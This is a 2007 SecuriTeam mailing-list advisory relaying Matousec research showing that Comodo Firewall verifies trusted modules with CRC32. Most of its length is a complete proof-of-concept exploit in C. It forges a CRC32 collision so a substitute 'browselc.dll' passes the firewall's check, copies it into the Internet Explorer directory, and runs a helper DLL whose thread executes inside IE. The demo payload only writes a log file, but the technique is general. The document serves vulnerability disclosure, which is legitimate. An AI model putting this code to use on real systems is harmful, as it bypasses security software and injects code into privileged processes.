[NT] Comodo DLL Injection via Weak Hash Function Exploitation Vulnerability
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 20 Feb 2007 13:51:03 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Comodo DLL Injection via Weak Hash Function Exploitation Vulnerability
------------------------------------------------------------------------
SUMMARY
The way Comodo verifies its components is vulnerable to CRC32 collisions,
allowing attackers to replace Comodo's files without the program detecting
it.
DETAILS
Vulnerable software:
* Comodo Firewall Pro 2.4.17.183
* Comodo Firewall Pro 2.4.16.174
* Comodo Personal Firewall 2.3.6.81
* probably all older versions of Comodo Personal Firewall 2
* possibly older versions of Comodo Personal Firewall
Comodo Firewall Pro (former Comodo Personal Firewall) implements a
component control, which is based on a checksum
comparison of process modules. Probably to achieve a better performance,
cyclic redundancy check (CRC32) is used as a
checksum function in its implementation. However, CRC32 was developed for
error detection purposes and can not be used
as a reliable cryptographic hashing function because it is possible to
generate collisions in real time. The character
of CRC32 allows attacker to construct a malicious module with the same
CRC32 checksum as a chosen trusted module in the
target system and thus bypass the protection of the component control.
Exploit:
crc32.c
/*
CRC32 checksum calculator
based on implementation of "efone - Distributed internet phone system"
*/
/*
* efone - Distributed internet phone system.
*
* (c) 1999,2000 Krzysztof Dabrowski
* (c) 1999,2000 ElysiuM deeZine
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version
* 2 of the License, or (at your option) any later version.
*
*/
/* based on implementation by Finn Yannick Jacobs */
#include <stdio.h>
#include <stdlib.h>
#include "crc32.h"
/* crc_tab[] -- this crcTable is being build by chksum_crc32GenTab().
* so make sure, you call it before using the other
* functions!
*/
u_int32_t crc_tab[256];
/* chksum_crc() -- to a given block, this one calculates the
* crc32-checksum until the length is
* reached. the crc32-checksum will be
* the result.
*/
/*
u_int32_t chksum_crc32 (unsigned char *block, unsigned int length)
{
register unsigned long crc;
unsigned long i;
crc = 0xFFFFFFFF;
for (i = 0; i < length; i++)
{
crc = ((crc >> 8) & 0x00FFFFFF) ^ crc_tab[(crc ^ *block++) & 0xFF];
}
return (crc ^ 0xFFFFFFFF);
}
*/
u_int32_t chksum_crc32_cont (unsigned char *block, unsigned int
length,unsigned long i1,unsigned long crc1)
{
register unsigned long crc;
unsigned long i;
// crc = 0xFFFFFFFF;
crc = crc1;
block += i1;
for (i = i1; i < length; i++)
{
crc = ((crc >> 8) & 0x00FFFFFF) ^ crc_tab[(crc ^ *block++) & 0xFF];
}
// return (crc ^ 0xFFFFFFFF);
return crc;
}
/* chksum_crc32gentab() -- to a global crc_tab[256], this one will
* calculate the crcTable for
crc32-checksums.
* it is generated to the polynom [..]
*/
void chksum_crc32gentab ()
{
unsigned long crc, poly;
int i, j;
poly = 0xEDB88320L;
for (i = 0; i < 256; i++)
{
crc = i;
for (j = 8; j > 0; j--)
{
if (crc & 1)
{
crc = (crc >> 1) ^ poly;
}
else
{
crc >>= 1;
}
}
crc_tab[i] = crc;
}
}
test.c
/*
Testing program for DLL injection via weak hash function exploitation
(BTP00005P005CF)
Usage:
prog IEPATH
IEPATH - Internet Explorer installation directory
Description:
This program assumes that Internet Explorer is a privileged application
and its components
are protected by CFP to prevent DLL injections. This program copies
"browseui.dll" and its
own copy of "browselc.dll" to the Internet Explorer installation
directory. When Internet Explorer
is run a malicious code is executed with all the privileges of Internet
Explorer.
In this demostration the malicious code is simulated by a harmless code
that logs messages to
a file. Fake "browselc.dll" can be arbitrary DLL which is modified on its
end to have
the same CRC32 as the original DLL in the system.
Test:
Running the testing program with the Internet Explorer installation
directory as an argument
and running Internet Explorer itself.
*/
#include <stdio.h>
#include <windows.h>
#include "crc32.h"
static const struct CRC_IJK
{
u_int32_t crc;
int i;
int j;
int k;
} known[] =
{
{ 0xA69F47D5, 0x0B1B, 0x6554, 0xA86B00E4 }, // Windows 2000 Service
Pack 4
{ 0x5BC25C24, 0x0808, 0x6821, 0xC32A810C }, // Windows XP Service Pack
2
{ 0xB6651040, 0x088A, 0x2653, 0xA86B0040 }, // Windows Server 2003
Standard Edition Service Pack 1
{ 0x00000000, 0x0000, 0x0000, 0x00000000 }
};
void about(void)
{
printf("Testing program for DLL injection via weak hash function
exploitation (BTP00005P005CF)\n");
printf("Windows Personal Firewall analysis project\n");
printf("Copyright 2007 by Matousec - Transparent security\n");
printf("http://www.matousec.com/""\n\n";);
return;
}
void usage(void)
{
printf("Usage: test IEPATH\n"
" IEPATH - Internet Explorer installation directory\n");
return;
}
void print_last_error(void)
{
LPTSTR buf;
DWORD code=GetLastError();
if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
{
fprintf(stderr,"Error code: %ld\n",code);
fprintf(stderr,"Error message: %s",buf);
LocalFree(buf);
} else fprintf(stderr,"Unable to format error message for code
%ld.\n",code);
return;
}
int main(int argc,char **argv)
{
about();
if (argc!=2)
{
usage();
return 1;
}
chksum_crc32gentab();
char
sysdir[MAX_PATH],browseui_org[MAX_PATH],browselc_org[MAX_PATH],browseui_new[MAX_PATH],testdll_new[MAX_PATH];
GetSystemDirectory(sysdir,MAX_PATH);
snprintf(browseui_org,MAX_PATH,"%s\\browseui.dll",sysdir);
snprintf(browselc_org,MAX_PATH,"%s\\browselc.dll",sysdir);
snprintf(browseui_new,MAX_PATH,"%s\\browseui.dll",argv[1]);
snprintf(testdll_new,MAX_PATH,"%s\\browselc.dll",argv[1]);
int result=FALSE;
u_int32_t crc_bsorg=0;
HANDLE
file=CreateFile(browselc_org,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL);
if (file!=INVALID_HANDLE_VALUE)
{
DWORD size=GetFileSize(file,NULL);
char *data=malloc(size);
if (data)
{
DWORD bytes;
if (ReadFile(file,data,size,&bytes,NULL))
{
crc_bsorg=chksum_crc32_cont(data,size,0,0xFFFFFFFF) ^ 0xFFFFFFFF;
printf("crc=0x%X\n",crc_bsorg);
}
free(data);
}
CloseHandle(file);
}
int ki=1,kj=1,kk=0xC32A8101,kmatch=FALSE;
for (int idx=0;known[idx].crc;idx++)
if (known[idx].crc==crc_bsorg)
{
kmatch=TRUE;
ki=known[idx].i;
kj=known[idx].j;
kk=known[idx].k;
printf("CRC value for \"browselc.dll\" matches known value idx =
%d.\n",idx);
break;
}
int match=FALSE;
file=CreateFile("testdll.dll",GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL);
if (file!=INVALID_HANDLE_VALUE)
{
DWORD size=GetFileSize(file,NULL);
char *data=malloc(size);
if (data)
{
DWORD bytes;
if (ReadFile(file,data,size,&bytes,NULL))
{
int pat=0;
for (int i=0;i<size-sizeof(DWORD);i++)
if ((*(DWORD*)&data[i])==0x58585858)
{
pat=i;
break;
}
if (pat)
{
printf("Pattern found at offset %d.\n",pat);
u_int32_t crc1=chksum_crc32_cont(data,pat,0,0xFFFFFFFF);
printf("crc1 = 0x%X\n",crc1);
PDWORD di=(PDWORD)&data[pat+0];
PDWORD dj=(PDWORD)&data[pat+sizeof(DWORD)];
PDWORD dk=(PDWORD)&data[pat+2*sizeof(DWORD)];
printf("Assembling DLL ...");
u_int32_t crc_test=0;
for (int k=kk;k!=0;k++)
{
*dk=(DWORD)k;
for (int j=kj;j<0x8000;j++)
{
*dj=(DWORD)j;
for (int i=ki;i<0x1000;i++)
{
*di=(DWORD)i;
crc_test=chksum_crc32_cont(data,size,pat,crc1) ^
0xFFFFFFFF;
match=crc_test==crc_bsorg;
if (match)
{
printf("\n\nMatch found for i=0x%lX, j=0x%lX,
k=0x%lX\n",(DWORD)i,(DWORD)j,(DWORD)k);
break;
}
}
if (match) break;
}
if (!(k%0x100))
printf("\ncurrent k = 0x%lX, last hash = 0x%X continue
",(DWORD)k,crc_test);
if (match) break;
}
printf("\n");
} else fprintf(stderr,"Unable to find pattern in
\"testdll.dll\".\n");
}
if (match)
{
HANDLE
newfile=CreateFile(testdll_new,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if (newfile!=INVALID_HANDLE_VALUE)
{
if (WriteFile(newfile,data,size,&bytes,NULL))
{
result=CopyFile(browseui_org,browseui_new,FALSE);
if (!result)
{
fprintf(stderr,"Unable to copy \"%s\" to
\"%s\".\n",browseui_org,browseui_new);
print_last_error();
fprintf(stderr,"\n");
} else printf("\"%s\" copied to
\"%s\".\n",browseui_org,browseui_new);
} else
{
fprintf(stderr,"Unable to write to file
\"%s\".\n",testdll_new);
print_last_error();
fprintf(stderr,"\n");
}
CloseHandle(newfile);
} else
{
fprintf(stderr,"Unable to create file \"%s\".\n",testdll_new);
print_last_error();
fprintf(stderr,"\n");
}
}
free(data);
}
CloseHandle(file);
} else
{
fprintf(stderr,"Unable to open \"testdll.dll\".\n");
print_last_error();
fprintf(stderr,"\n");
}
result ? printf("\nTEST SUCCESSFUL!\n") : printf("\nTEST FAILED!\n");
return result ? 0 : 1;
}
testdll.c
/*
Helper DLL for Testing program for DLL injection via weak hash function
exploitation (BTP00005P005CF)
Description:
This DLL will be loaded into Internet Explorer when it starts. IE is
assumed to be allowed to access the Internet.
A malicious code is simulated by a harmless code that logs messages to a
file in this sample.
*/
#undef __STRICT_ANSI__
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
#include <ddk/ntapi.h>
HANDLE thread=NULL;
char msg[1024];
/*
logmsg logs messages to C:\BTP00005P005CF.log
*/
void logmsg(void)
{
HANDLE
log=CreateFile("C:\\BTP00005P005CF.log",GENERIC_WRITE,0,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if (log!=INVALID_HANDLE_VALUE)
{
SetFilePointer(log,0,NULL,FILE_END);
DWORD bytes;
WriteFile(log,msg,strlen(msg),&bytes,NULL);
CloseHandle(log);
}
return;
}
/*
thread routine that can execute malicious code with privileges of
"iexplore.exe"
*/
DWORD WINAPI thread_proc(HMODULE module)
{
char hostname[MAX_PATH],dllname[MAX_PATH];
GetModuleFileName(module,dllname,sizeof(dllname));
GetModuleFileName(NULL,hostname,sizeof(hostname));
while (1)
{
snprintf(msg,1024,"Any code can be executed now in process PID=%ld
(%s), using module at 0x%p.\n",
GetCurrentProcessId(),hostname,module);
logmsg();
Sleep(10000);
}
return 0;
}
/*
DLL entry point
*/
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved)
{
if (fdwReason==DLL_PROCESS_ATTACH)
{
snprintf(msg,1024,"DLL_PROCESS_ATTACH for testdll.dll in process
PID=%ld, TID=%ld, hinstDLL = 0x%p\n",
GetCurrentProcessId(),GetCurrentThreadId(),hinstDLL);
logmsg();
DisableThreadLibraryCalls(hinstDLL);
thread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)thread_proc,hinstDLL,0,NULL);
if (thread)
{
snprintf(msg,1024,"DLL_PROCESS_ATTACH[PID=%ld,TID=%ld] New thread
created\n",GetCurrentProcessId(),GetCurrentThreadId());
logmsg();
} else
{
snprintf(msg,1024,"DLL_PROCESS_ATTACH[PID=%ld,TID=%ld] ERROR:
CreateThread failed with error %ld\n",
GetCurrentProcessId(),GetCurrentThreadId(),GetLastError());
logmsg();
}
}
if ((fdwReason==DLL_PROCESS_DETACH) && thread)
{
snprintf(msg,1024,"DLL_PROCESS_DETACH for testdll.dll in process
PID=%ld, hinstDLL = 0x%p\n",GetCurrentProcessId(),hinstDLL);
logmsg();
TerminateThread(thread,0);
CloseHandle(thread);
}
return TRUE;
}
crc32.h
/*
CRC32 checksum calculator
based on implementation of "efone - Distributed internet phone system"
*/
/*
* efone - Distributed internet phone system.
*
* (c) 1999,2000 Krzysztof Dabrowski
* (c) 1999,2000 ElysiuM deeZine
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version
* 2 of the License, or (at your option) any later version.
*
*/
/* based on implementation by Finn Yannick Jacobs. */
#define u_int32_t unsigned int
void chksum_crc32gentab ();
//u_int32_t chksum_crc32 (unsigned char *block, unsigned int length);
u_int32_t chksum_crc32_cont (unsigned char *block, unsigned int
length,unsigned long i,unsigned long crc);
extern u_int32_t crc_tab[256];
ADDITIONAL INFORMATION
The information has been provided by <mailto:research@xxxxxxxxxxxx>
Matousec - Transparent security Research.
The original article can be found at:
<http://www.matousec.com/info/advisories/Comodo-DLL-injection-via-weak-hash-function-exploitation.php> http://www.matousec.com/info/advisories/Comodo-DLL-injection-via-weak-hash-function-exploitation.php
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] Lizardtech DjVu Browser Plug-in Multiple Vulnerabilities
- Next by Date: [NT] EasyMail Objects Connect Method Stack Overflow
- Previous by thread: [NT] Lizardtech DjVu Browser Plug-in Multiple Vulnerabilities
- Next by thread: [NT] EasyMail Objects Connect Method Stack Overflow
- Index(es):
Relevant Pages
|
